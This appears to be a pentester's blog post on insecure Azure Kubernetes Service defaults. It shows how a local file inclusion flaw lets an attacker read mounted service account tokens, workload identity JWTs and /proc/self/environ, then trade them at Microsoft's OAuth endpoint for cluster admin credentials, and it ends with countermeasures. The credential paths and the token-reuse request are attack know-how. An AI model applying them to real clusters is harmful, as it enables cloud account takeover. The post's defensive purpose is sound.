Kubernetes has become an essential component of modern web applications. Its adoption has grown rapidly in recent years, and as penetration testers and red teamers we increasingly encounter infrastructures running on Kubernetes.
However, managing a Kubernetes cluster yourself is a significant undertaking, which is why many organizations rely on managed solutions from Azure, AWS, or GCP. This blog focuses specifically on insecure default configurations in Azure Kubernetes Service (AKS) and how attackers can exploit simple vulnerabilities to potentially compromise an entire cluster.
Kubernetes Basics
| Term | Description |
| Container | A single containerd or Docker container |
| Pod | An executable unit in Kubernetes. It must contain at least one container but can also include multiple related containers |
| Namespace | A tool used to organize Kubernetes resources. Access permissions can be defined at the cluster or namespace level |
| Worker | A VM or computer capable of running pods |
| Service Account | A Kubernetes service account that allows pods to access the Kubernetes API |
| Managed Identity | An Azure service principal that allows virtual machines to access the Azure API |
For this article, two fundamental topics are relevant: the separation between control and worker nodes and Kubernetes internal service accounts.

The control plane is responsible for managing the entire cluster. It determines on which worker a new pod should start, whether a pod needs to scale, or if a worker has gone offline. Additionally, the control plane exposes the Kubernetes API. This API is used to manage the entire cluster (creating secrets, starting pods, executing commands in containers, etc.). The API is protected by JWTs and cannot be accessed anonymously (i.e., without a token) by default.
Tools such as kubectl also use this API under the hood. For example, the request below lists all running pods in the current namespace.
If a pod needs access to this API, Kubernetes uses Service Accounts. These accounts are assigned permissions within the cluster that allow them to use specific API endpoints. For example, if you run a CI/CD system such as ArgoCD (https://argoproj.github.io/cd/), it runs inside the cluster as a pod. In order for ArgoCD to create new pods, a service account with the necessary permissions must be configured.
The required JWT for API access is automatically managed by Kubernetes and mounted into the pod at /var/run/secrets/kubernetes.io/serviceaccount/token. This mounting happens by default for every pod, even if the service account itself has no permissions. The token is mounted unless it is explicitly disabled in the configuration.
In other words, when configuring pods you must explicitly prevent this mount if it should not occur.
Managed Identities in Azure
A relatively equivalent feature in Azure is Managed Identities (AWS and GCP provide similar functionality under different names). Managed Identities allow virtual machines to obtain permissions for the Azure API (management.azure.com). For example, a VM can be granted access to an Azure Storage account without storing credentials locally on the VM.
Applications can request an access token by calling the internally available metadata service. The required endpoint is provided by the following URL: http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
The Metadata header is important here as it is required in the request to prevent exploitation through Server-Side Request Forgery (SSRF) to retrieve the token.
With this access token, the application can then interact with the Azure API using the permissions granted to the Managed Identity.
Combining Both Worlds
With this foundational knowledge, we can now take a look at managed Kubernetes clusters in Azure.
After creating the cluster, and importantly using the default configurations, we are presented with the following overview:

What does this actually mean? The management API of the created cluster is freely accessible on the internet because IP allowlisting is not enabled by default and the cluster is not created as a private cluster. This can be seen when a simple request is sent to the above URL:
Since we don’t have a token, we get an “Unauthorized” response from the API. But what if there is a vulnerability in the pod that allows arbitrary files to be read (e.g., remote code execution or local file inclusion)? As pentesters, we encounter local file inclusions in particular somewhat frequently.
As an example, let’s assume that a CI/CD pipeline is running in the cluster that allows build artifacts to be listed.

Clicking on the file displays its contents.

In this example, the implementation is flawed and does not check where the file to be read is opened from (the classic case that makes local file inclusion possible). By manipulating the request parameters, any files can be read from the hard drive.

As a reminder, each pod has the token for cluster-internal API access mounted by default, even if this token is not used at all (/var/run/secrets/kubernetes.io/serviceaccount/token). This means that this token can be read with our simple LFI.

Normally, an attacker would need the ability to execute code on this system in order to communicate internally with the API. However, our cluster’s API is accessible from the internet at test-vqims8hi.hcp.westeurope.azmk8s.io, which is confirmed by a look at the JWT:
Conversely, this means that we can use this token in the name of the service account to authenticate ourselves to the Kubernetes API.
If this service account has permissions to read secrets in the cluster, start new pods, or change configurations, for example, we can do this from the internet.
One Level Deeper: Authentication with Workload Identities
However, since different pods usually run on a Kubernetes worker and have different permissions in Azure, the managed identity solution is no longer effective. To stick with the CI/CD pipeline example: This can be divided into a build manager that needs access to a message queue and a database, for example. As an additional component, we have the builder, which needs access to the source repository. However, both components can run independently of each other on the same worker. To solve this problem, there are so-called workload identities.
When using workload identities in Azure Kubernetes Service (AKS), the authentication process is implemented through a combination of Kubernetes service accounts, federated identities, and Azure Managed Identities. This mechanism allows pods to authenticate with the permissions of an Azure Managed Identity without storing credentials directly on the VM. The following steps describe the authentication process in detail:
- Service Account and Federated Identity Setup
- A Kubernetes service account is created and linked to a federated identity. This link is configured via Entra and defines which Azure Managed Identity is responsible for the service account.
- Kubernetes generates a JWT (JSON Web Token) that is valid for the service account. This token is automatically mounted in the pod, with the path stored in the AZURE_FEDERATED_TOKEN_FILE environment variable. (e.g. /var/run/secrets/azure/tokens/azure-identity-token).
- Token query and client assertion login
- The application in the pod reads the JWT from the mounted file path. This token serves as the client assertion in the OAuth 2.0 flow.
- Using the token, AZURE_TENANT_ID, and AZURE_CLIENT_ID (retrieved from environment variables such as /proc/self/environ), the application sends a POST request to https://login.microsoftonline.com/<tenant_id>/oauth2/v2.0/token.
- The request looks like the following:
scope=https://management.azure.com/.default client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer
client_id=<client_id>
client_assertion=<JWT>
grant_type=client_credentials - Microsoft’s authentication service validates the JWT and issues an access token for the target resource (e.g., Azure Management API).
- Accessing Azure Ressources
- The access token received is used to send requests to the Azure API (e.g., https://management.azure.com/<resource>/listClusterAdminCredential)
- Since the token comes directly from the pod, no direct code execution is required on the worker node—only access to the JWT in the file system.

Why is this exploitable?
- LFI exploitation: If a vulnerability such as Local File Inclusion (LFI) exists in the application, an attacker can extract the JWT from /var/run/secrets/azure/tokens/azure-identity-token. This token is equivalent to a client secret and allows the creation of an access token for Azure resources.
- No code execution required: The attack works because the JWT is already available in the pod and authentication is performed via Azure’s OAuth endpoint. Even without direct code execution on the worker node, the token can be used to authenticate with Microsoft.
- Misconfigurations: By default, the JWT is automatically mounted unless explicitly disabled in the configuration. This creates a risk if pods are not strictly isolated.
The familiar CI/CD application will serve as an example again. We begin by reading the current environment variables. These are located in /proc/self/environ.

The following variables are relevant:
- AZURE_TENANT_ID
- AZURE_CLIENT_ID
- AZURE_FEDERATED_TOKEN_FILE
We can read the required token by reading the value of AZURE_FEDERATED_TOKEN_FILE via our LFI (in this case /var/run/secrets/azure/tokens/azure-identity-token).

This token is equivalent to the client secret or password and can be used for normal login at login.microsoftonline.com. The only other information we need is the client ID and tenant ID, which we have already obtained from the environment variables.
This token can now be used with the usual Microsoft administration tools or directly with the Azure API. In this case, the managed identity had the cluster administrator role, which allows admin credentials to be requested:
Countermeasures
The following measures are crucial to ensuring the security of Kubernetes clusters and managed cloud infrastructures such as Azure AKS:
- Protecting the Kubernetes API
- Ensure that AKS clusters are configured as private clusters by default. This blocks public access to the Kubernetes API and requires explicit network rules for access.
- If private clusters are not a solution, restrict access to the management plane to a few known IP addresses.
- Protecting Service Accounts
- Set the automountServiceAccountToken value to false in pod definitions to prevent the Kubernetes API token from being automatically mounted. This prevents the token from being accessed via vulnerabilities (such as an LFI).
- Use Kubernetes Role-Based Access Control (RBAC) to grant service accounts only the minimum necessary permissions. For example, avoid sharing secrets or pod management rights unless explicitly required.
- Regular security audits and updates
- Regularly test your Kubernetes clusters and Azure infrastructure for vulnerabilities, especially for managed services such as AKS.
- The application running on Kubernetes should be tested at least as regularly.
Conclusion
The combination of insecure default settings in Azure Kubernetes Services (AKS) and the automatic provisioning of service account tokens or workload identity JWTs creates significant risks for cluster security. Simple (LFI) vulnerabilities allow attackers to extract sensitive tokens from pods and misuse them to authenticate to the Kubernetes API or Azure resources.
Security in modern environments is a joint project, and security can only be achieved when all the cogs mesh together: The ops team must provide a secure infrastructure that offers the smallest possible attack surface. The dev team must write secure code wherever possible to prevent exploitable security vulnerabilities from arising. The security team must then collect the relevant logs and have a functioning alerting system in place to detect attacks. In my experience as a pentester and red teamer, however, this interaction only works for very few of our customers. Security is often based on assumptions. Statements such as “That’s the security team’s job” are not uncommon. But everyone contributes to a secure overall structure in their area of responsibility.
